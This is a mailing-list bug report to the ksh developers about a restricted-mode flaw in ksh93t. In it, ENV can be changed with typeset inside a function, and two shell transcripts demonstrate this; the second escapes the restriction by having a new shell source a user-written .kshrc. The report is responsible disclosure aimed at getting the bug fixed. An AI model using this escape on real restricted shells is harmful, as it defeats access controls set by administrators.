It's been a while since my initial report on ksh restricted mode bugs in
https://mailman.research.att.com/pipermail/ast-users/2007q1/001609.html . But, I
finally have the opportunity for a follow up.
Most of the bugs I reported were neatly fixed. However, one has remained all the
way through to the current Version M 93t 2008-11-04. It's still possible to
change the value of ENV through a typeset assignment in a function while in
restricted mode. The following examples I gave in my initial report still
violate restrictions when run in restricted mode:
# Attempt to assign a new value to ENV via typeset in a function in
# restricted mode.
$ function demoENV
> { print Before typeset ENV = $ENV
> typeset ENV=.kshrc
> print $?
> print After typeset ENV = $ENV
> print 'And from set: \c'; set | grep ^ENV=
> }
$ demoENV
Before typeset ENV = /Users/terrence/.kshrc
0
After typeset ENV = .kshrc
And from set: ENV=.kshrc
# Now, let's see if we can get the modified ENV to do something nasty
# (but not too nasty -- it's only a demo).
$ function moreENV
> { print Before typeset ENV = $ENV
> typeset -x ENV=.kshrc
> print $?
> print After typeset ENV = $ENV
> print 'And from env: \c'; env | grep ^ENV=
> print print in .kshrc | tee .kshrc | read
> print exit | ksh -E
> }
$ moreENV
Before typeset ENV = /Users/terrence/.kshrc
0
After typeset ENV = .kshrc
And from env: ENV=.kshrc
in .kshrc
However contrived the second example might be, the point is that any
restrictions on ENV can be circumvented with a typeset in a function. It's kind
of strange that ENV is the only restricted variable that breaks restrictions
like this.
Terrence Doyle
PS:
>From now on I will post my bug reports to ast-developers as directed under AT&T
Research AST and UWIN mailing groups at
http://www.research.att.com/sw/download/ .
_______________________________________________
ast-developers mailing list
[email protected]
https://mailman.research.att.com/mailman/listinfo/ast-developers
